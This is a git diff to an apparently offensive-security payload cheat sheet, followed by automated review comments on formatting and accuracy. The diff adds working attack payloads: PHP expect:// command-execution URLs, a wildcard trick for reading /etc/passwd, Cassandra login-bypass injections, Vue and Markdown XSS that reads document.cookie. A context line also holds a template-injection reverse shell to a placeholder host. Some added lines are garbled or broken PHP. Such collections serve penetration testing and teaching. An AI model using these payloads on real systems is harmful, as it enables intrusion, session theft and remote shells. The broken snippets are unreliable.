diff --git a/File Inclusion - Path Traversal/README.md b/File Inclusion - Path Traversal/README.md index f5b936c0..4370e8a5 100644 --- a/File Inclusion - Path Traversal/README.md +++ b/File Inclusion - Path Traversal/README.md @@ -174,8 +174,8 @@ Fun fact: you can trigger an XSS and bypass the Chrome Auditor with : `http://ex ### Wrapper expect:// ```powershell -http://example.com/index.php?page=php:expect://id -http://example.com/index.php?page=php:expect://ls +http://example.com/index.php?page=expect://id +http://example.com/index.php?page=expect://ls ``` ### Wrapper input:// @@ -245,7 +245,7 @@ http://example.com/index.php?page=path/to/uploaded/file.png In order to keep the file readable it is best to inject into the metadata for the pictures/doc/pdf ## LFI to RCE via upload (race) - +Worlds Quitest Let's Play" * Upload a file and trigger a self-inclusion. * Repeat 1 a shitload of time to: * increase our odds of winning the race diff --git a/PHP juggling type/README.md b/PHP juggling type/README.md index 6349f6d8..0a545868 100644 --- a/PHP juggling type/README.md +++ b/PHP juggling type/README.md @@ -1,6 +1,35 @@ # PHP Juggling type and magic hashes -## Exploit +## Type Juggling + +True statements + +```php +var_dump('0010e2' == '1e3'); # true +var_dump('0xABCdef' == ' 0xABCdef'); # true PHP 5.0 / false PHP 7.0 +var_dump('0xABCdef' == ' 0xABCdef'); # true PHP 5.0 / false PHP 7.0 +var_dump('0x01' == 1) # true PHP 5.0 / false PHP 7.0 +var_dump('0x1234Ab' == '1193131'); + +'123' == 123 +'123a' == 123 +'abc' == 0 + +'' == 0 == false == NULL +'' == 0 # true +0 == false # true +false == NULL # true +NULL == '' # true +``` + +NULL statements + +```php +var_dump(sha1([])); # NULL +var_dump(md5([])); # NULL +``` + +## Magic Hashes - Exploit ```php ``` diff --git a/Remote commands execution/README.md b/Remote commands execution/README.md index 0ccdcedf..6e782682 100644 --- a/Remote commands execution/README.md +++ b/Remote commands execution/README.md 
@@ -102,6 +102,8 @@ who$@ami Bypass blacklisted word with variable expansion ```powershell +/???/??t /???/p??s?? + test=/ehhh/hmtc/pahhh/hmsswd cat ${test//hhh\/hm/} cat ${test//hh??hm/} diff --git a/SQL injection/Cassandra Injection.md b/SQL injection/Cassandra Injection.md new file mode 100644 index 00000000..1084ce38 --- /dev/null +++ b/SQL injection/Cassandra Injection.md @@ -0,0 +1,37 @@ +# Cassandra Injection + +> Apache Cassandra is a free and open-source distributed wide column store NoSQL database management system + +## Cassandra comment + +```sql +/* Cassandra Comment */ +``` + +## Cassandra - Login Bypass + +### Login Bypass 0 + +```sql +username: admin' ALLOW FILTERING; %00 +password: ANY +``` + +### Login Bypass 1 + +```sql +username: admin'/* +password: */and pass>' +``` + +The injection would look like the following SQL query + +```sql +SELECT * FROM users WHERE user = 'admin'/*' AND pass = '*/and pass>'' ALLOW FILTERING; +``` + +Example from EternalNoob : [https://hack2learn.pw/cassandra/login.php](https://hack2learn.pw/cassandra/login.php) + +## Thanks to + +* [Injection In Apache Cassandra – Part I - Rodolfo - EternalNoobs](https://eternalnoobs.com/injection-in-apache-cassandra-part-i/) \ No newline at end of file diff --git a/SQL injection/MySQL Injection.md b/SQL injection/MySQL Injection.md index 79a70c69..88aaf929 100644 --- a/SQL injection/MySQL Injection.md +++ b/SQL injection/MySQL Injection.md @@ -1,6 +1,6 @@ # MYSQL Injection -## MySQL +## MySQL ```sql # MYSQL Comment diff --git a/SQL injection/README.md b/SQL injection/README.md index 595a7a05..63af6c21 100644 --- a/SQL injection/README.md +++ b/SQL injection/README.md @@ -1,6 +1,6 @@ # SQL injection -A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application +A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. ## Summary 
@@ -9,6 +9,7 @@ A SQL injection attack consists of insertion or "injection" of a SQL query via t * [CheatSheet OracleSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/OracleSQL%20Injection.md) * [CheatSheet PostgreSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/PostgreSQL%20Injection.md) * [CheatSheet SQLite Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/SQLite%20Injection.md) +* [CheatSheet Cassandra Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/Cassandra%20Injection.md) * [Entry point detection](#entry-point-detection) * [DBMS Identification](#dbms-identification) * [SQL injection using SQLmap](#sql-injection-using-sqlmap) diff --git a/Server Side Template injections/README.md b/Server Side Template injections/README.md index e0e48993..7ce960f8 100644 --- a/Server Side Template injections/README.md +++ b/Server Side Template injections/README.md @@ -201,15 +201,21 @@ Inject this template {{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }} # connect to evil host ``` -## AngularJS +## Client Side Template Injection -### AngularJS - Basic injection +### AngularJS ```javascript $eval('1+1') {{1+1}} ``` +### Vue JS + +```javascript +{{constructor.constructor('alert(1)')()}} +``` + ## Thanks to * [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/) diff --git a/Server Side Template injections/serverside.png b/Server Side Template injections/serverside.png new file mode 100644 index 00000000..4733bec1 Binary files /dev/null and b/Server Side Template injections/serverside.png differ diff --git a/XSS injection/README.md b/XSS injection/README.md index 4c6edb0f..06f14fd3 100644 --- a/XSS injection/README.md +++ b/XSS injection/README.md 
@@ -6,7 +6,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall - [Identify an XSS endpoint](#identify-an-xss-endpoint) - [XSS in HTML/Applications](#xss-in-htmlapplications) - [XSS in wrappers javascript and data URI](#xss-in-wrappers-javascript-and-data-uri) -- [XSS in files](#xss-in-files) +- [XSS in files (XML/SVG/CSS/Flash/Markdown)](#xss-in-files) - [Polyglot XSS](#polyglot-xss) - [Filter Bypass and Exotic payloads](#filter-bypass-and-exotic-payloads) - [CSP Bypas](#csp-bypass) @@ -233,6 +233,15 @@ XSS in SVG (short) </title><script>alert(3)</script> ``` +XSS in Markdown + +```csharp +[a](javascript:prompt(document.cookie)) +[a](j a v a s c r i p t:prompt(document.cookie)) +[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K) +[a](javascript:window.onerror=alert;throw%201) +``` + XSS in SWF flash application ```powershell @@ -693,6 +702,8 @@ Exotic payloads ## CSP Bypass +Check the CSP on [https://csp-evaluator.withgoogle.com](https://csp-evaluator.withgoogle.com) and the post : [How to use Google’s CSP Evaluator to bypass CSP](https://blog.thomasorlita.cz/vulns/google-csp-evaluator/) + ### Bypass CSP using JSONP from Google (Trick by [@apfeifer27](https://twitter.com/apfeifer27)) //google.com/complete/search?client=chrome&jsonp=alert(1); diff --git a/XSS injection/XSS in Angular.md b/XSS injection/XSS in Angular.md index c627659e..89d73766 100644 --- a/XSS injection/XSS in Angular.md +++ b/XSS injection/XSS in Angular.md @@ -132,3 +132,9 @@ Angular 1.0.1 - 1.1.5 ```javascript {{constructor.constructor('alert(1)')()}} ``` + +Vue JS + +```javascript +{{constructor.constructor('alert(1)')()}} +``` \ No newline at end of file
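Review bot: In `File Inclusion - Path Traversal/README.md` @@ -174, the two URLs under `### Wrapper expect://` still sit in a fence tagged `powershell`; they are plain URLs, so tag the fence `text` (or leave it untagged) so the highlighter does not mislabel them. The change itself, dropping the `php:` prefix so the lines read `page=expect://id`, matches the documented `expect://` wrapper form; since the PHP manual notes that this wrapper is only available when the expect extension is installed, a short sentence saying so would tell readers that a default build is not exposed to it.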
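Review bot: In `File Inclusion - Path Traversal/README.md` @@ -245, the added line `Worlds Quitest Let's Play"` under `## LFI to RCE via upload (race)` is stray text: it has no connection to the section, misspells "Quietest", and carries an unbalanced closing quote. It reads like an accidental paste; drop it and keep the blank line it replaced, so the heading is followed directly by the bullet list.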
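Review bot: In `PHP juggling type/README.md` @@ -1,6, the new `## Type Juggling` block has several defects that keep it from running as PHP: `var_dump('0xABCdef' == ' 0xABCdef');` appears twice, `var_dump('0x01' == 1)` lacks its semicolon, `var_dump('0x1234Ab' == '1193131');` is the only comparison without a result annotation (0x1234Ab is 1193131 in decimal, so it follows the same PHP 5 true / PHP 7 false split as its neighbours), and `'' == 0 == false == NULL` is a parse error because `==` is non-associative in PHP; the four single comparisons beneath it already say the same thing. The `NULL statements` block should also carry a version note like the lines above it, since on PHP 8 `sha1([])` and `md5([])` throw a `TypeError` instead of returning NULL. Finally, because the section's whole point is that loose comparison misbehaves, state the fix readers need: compare with `===`, and compare hashes with `hash_equals()`, which is what makes the magic-hash cases below harmless.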
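Review bot: In `Remote commands execution/README.md` @@ -102, the added line `/???/??t /???/p??s??` sits under the sentence `Bypass blacklisted word with variable expansion`, but it relies on shell wildcard (glob) expansion, not variable expansion, and it is unrelated to the `test=...` / `${test//...}` lines that follow; give it its own heading so readers, and anyone writing detections for either pattern, can tell the two mechanisms apart. The fence is also tagged `powershell` for what is Bourne-shell syntax; `bash` would be accurate.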
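Review bot: In the new `SQL injection/Cassandra Injection.md`, the sentence `The injection would look like the following SQL query` should say CQL query: Cassandra's query language is CQL, and the `ALLOW FILTERING` clause in the rendered statement is CQL-specific, which is the reason this page deserves its own file. Smaller points: the file ends without a trailing newline (`\ No newline at end of file`); the `Login Bypass` fences hold `username:` / `password:` form values rather than SQL, so `text` fits better than `sql`; the credit reads `EternalNoob` in the body but `EternalNoobs` in `## Thanks to`; and the quoted description is missing its final period. A one-line mitigation note, that the driver's prepared statements with bound parameters (instead of CQL built by string concatenation) close both bypasses, would round the file out.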
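Review bot: In `Server Side Template injections/README.md` @@ -201, the renamed `## Client Side Template Injection` heading and the new `### Vue JS` subsection put client-side material in a README titled Server Side Template injections, and the same `{{constructor.constructor('alert(1)')()}}` line is also appended to `XSS injection/XSS in Angular.md` in this commit, so the payload now lives in two places. Keep it in one file and link to it from the other, and tag these fences `html` or `text` rather than `javascript`, since `{{1+1}}` is template syntax, not JavaScript.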
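Review bot: `Server Side Template injections/serverside.png` is added as a new binary file, but no hunk in this diff references it from the README (the only change to that README is the AngularJS/Vue block). Either embed it with an image link where it belongs or leave it out of this commit, so the repository does not carry an orphaned image.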
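Review bot: In `XSS injection/README.md` @@ -6,7, the summary entry is expanded to `XSS in files (XML/SVG/CSS/Flash/Markdown)` while its anchor stays `#xss-in-files`; that is right only if the section heading itself is still `XSS in files`, which the later hunk suggests (the Markdown block is added beneath the SVG one with no heading change), so the anchor is fine. While here, the context line `[CSP Bypas](#csp-bypass)` has a typo in its link text (`Bypass`).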
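Review bot: In `XSS injection/README.md` @@ -233, the new `XSS in Markdown` block is fenced as `csharp`; the four lines are Markdown link syntax, so tag the fence `markdown` (the neighbouring `XSS in SWF flash application` block has the same problem with `powershell`, but that is pre-existing). One line of context would also help: these links only matter when a renderer passes `javascript:` and `data:` targets through unchanged, so the defensive takeaway is an allowlist of link schemes at render time.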
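Review bot: In `XSS injection/README.md` @@ -693, the added sentence under `## CSP Bypass` has a stray space before the colon in `the post :`. It would also read better as a check rather than a bare pair of URLs if it said what a reader should look for in the evaluator's output, namely the directives it flags as weakening the policy.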
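Review bot: In `XSS injection/XSS in Angular.md` @@ -132, the appended `Vue JS` block leaves the file without a trailing newline (`\ No newline at end of file`), and it places a Vue payload in a file named for Angular with no note on which Vue versions it applies to, while the same line is added to the SSTI README in this commit. Add the final newline, and keep the Vue entry in one place with a version range, as the Angular entries above it carry (`Angular 1.0.1 - 1.1.5`).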